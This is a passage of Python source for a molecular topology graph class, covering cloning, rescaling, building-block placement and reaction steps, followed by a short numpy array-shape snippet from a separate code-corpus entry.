starting geometry. def undo_scale(vertex): return vertex.with_scale(1/self._scale) building_block_vertices: dict[ BuildingBlock, abc.Sequence[Vertex] ] building_block_vertices = { building_block_map.get(building_block, building_block): tuple(map(undo_scale, vertices)) for building_block, vertices in self._building_block_vertices.items() } scale = self._get_scale(building_block_vertices) def scale_vertex(vertex): return vertex.with_scale(scale) self._building_block_vertices = { building_block: tuple(map(scale_vertex, vertices)) for building_block, vertices in building_block_vertices.items() } def scale_edge(edge): # Remove the old scale and apply the new one. return edge.with_scale(scale/self._scale) self._edges = edges = tuple(map(scale_edge, self._edges)) def get_new_edge(edge_id): return edges[edge_id] self._edge_groups = tuple( EdgeGroup(map(get_new_edge, edge_group.get_edge_ids())) for edge_group in self._edge_groups ) self._scale = scale return self def with_building_blocks( self, building_block_map: dict[BuildingBlock, BuildingBlock], ) -> TopologyGraph: """ Return a clone holding different building blocks. Parameters: building_block_map: Maps a building block in the current topology graph to the building block which should replace it in the clone. If a building block should be not replaced in the clone, it can be omitted from the map. Returns: The clone. """ return self.clone()._with_building_blocks(building_block_map) def clone(self) -> TopologyGraph: """ Return a clone. Returns: The clone. """ return self._clone() def _clone(self: _TopologyGraphT) -> _TopologyGraphT: clone = self.__class__.__new__(self.__class__) clone._scale = self._scale clone._building_block_vertices = dict( self._building_block_vertices ) clone._edges = self._edges clone._reaction_factory = self._reaction_factory clone._implementation = self._implementation clone._optimizer = self._optimizer clone._edge_groups = self._edge_groups return clone def get_building_blocks(self) -> typing.Iterator[BuildingBlock]: """ Yield the building blocks. Building blocks are yielded in an order based on their position in the topology graph. For two equivalent topology graphs, but with different building blocks, equivalently positioned building blocks will be yielded at the same time. Yields: A building block of the topology graph. """ vertex_building_blocks = {} num_vertices = 0 for building_block, vertices in ( self._building_block_vertices.items() ): for vertex in vertices: num_vertices += 1 vertex_building_blocks[vertex.get_id()] = ( building_block ) yielded = set() for vertex_id in range(num_vertices): building_block = vertex_building_blocks[vertex_id] if building_block not in yielded: yielded.add(building_block) yield building_block def get_num_building_block( self, building_block: BuildingBlock, ) -> int: """ Get the number of times `building_block` is present. Parameters: building_block: The building block whose frequency in the topology graph is desired. Returns: The number of times `building_block` is present in the topology graph. """ return len( self._building_block_vertices.get(building_block, []) ) def _get_lattice_constants(self) -> typing.Iterator[np.ndarray]: """ Yield the lattice constants of the topology graph. The a, b and c lattice constants are yielded, in that order. By default, this is an empty generator. Yields: A lattice constant. """ return yield def construct(self) -> ConstructionResult: """ Construct a :class:`.ConstructedMolecule`. Returns: The data describing the :class:`.ConstructedMolecule`. """ state = self._get_construction_state() state = self._place_building_blocks(state) state = self._run_reactions(state) state = self._optimizer.optimize(state) return self._get_construction_result(state) def _get_construction_result( self, state: ConstructionState, ) -> ConstructionResult: """ Get the result of the construction. Parameters: state: The state of the molecule being constructed. Returns: The data describing the :class:`.ConstructedMolecule`. """ return ConstructionResult(state) def _get_construction_state(self) -> ConstructionState: return ConstructionState( building_block_vertices=self._building_block_vertices, edges=self._edges, lattice_constants=tuple( np.array(constant, dtype=np.float64)*self._scale for constant in self._get_lattice_constants() ), ) def _get_scale( self, building_block_vertices: dict[ BuildingBlock, abc.Sequence[Vertex], ], ) -> float: """ Get the scale, which should be applied to topology graph. The scale should be applied to the position of every vertex and edge of topology graph. This allows to graph to adjust based on the size of the building blocks. Parameters: building_block_vertices: Maps every :class:`.BuildingBlock` of the topology graph, to the :class:`.Vertex` instances it is meant to be placed on. Returns: The scale. """ raise NotImplementedError() def _place_building_blocks( self, state: ConstructionState, ) -> ConstructionState: """ Place the building blocks onto the vertices. Parameters: state: Holds data necessary to construct the molecule. Returns: The new construction state, updated to account for the placed building blocks. """ return self._implementation._place_building_blocks(state) def _run_reactions( self, state: ConstructionState, ) -> ConstructionState: """ Perform the reactions on the building blocks. Parameters: state: The current state of the construction process. Returns: The new construction state, updated to account for the reactions between building blocks. """ get_reaction = partial( self._reaction_factory.get_reaction, state, ) reactions = tuple(map(get_reaction, self._edge_groups)) results = map( lambda reaction: reaction.get_result(), reactions, ) return state.with_reaction_results(reactions, results) def _get_stages( self, construction_stages, ) -> typing.Iterator[tuple[int, ...]]: """ Yield the parallelizable stages of construction. Yields: Vertices ids, which can be placed in parallel. """ stages: tuple[list[int], ...] = tuple( [] for i in range(len(construction_stages)+1) ) vertices = flatten(self._building_block_vertices.values()) for vertex in vertices: placed = False for i, stage in enumerate(construction_stages): if stage(vertex): stages[i].append(vertex.get_id()) placed = True break if not placed: stages[-1].append(vertex.get_id()) yield from (tuple(stage) for stage in stages if stage) def __str__(self) -> str: return repr(self) def __repr__(self) -> str: raise NotImplementedError()
StarcoderdataPython
1662725
import numpy as np x = np.array([1, 2]) print(x.shape) y = np.expand_dims(x, axis=0) print(y.shape)
StarcoderdataPython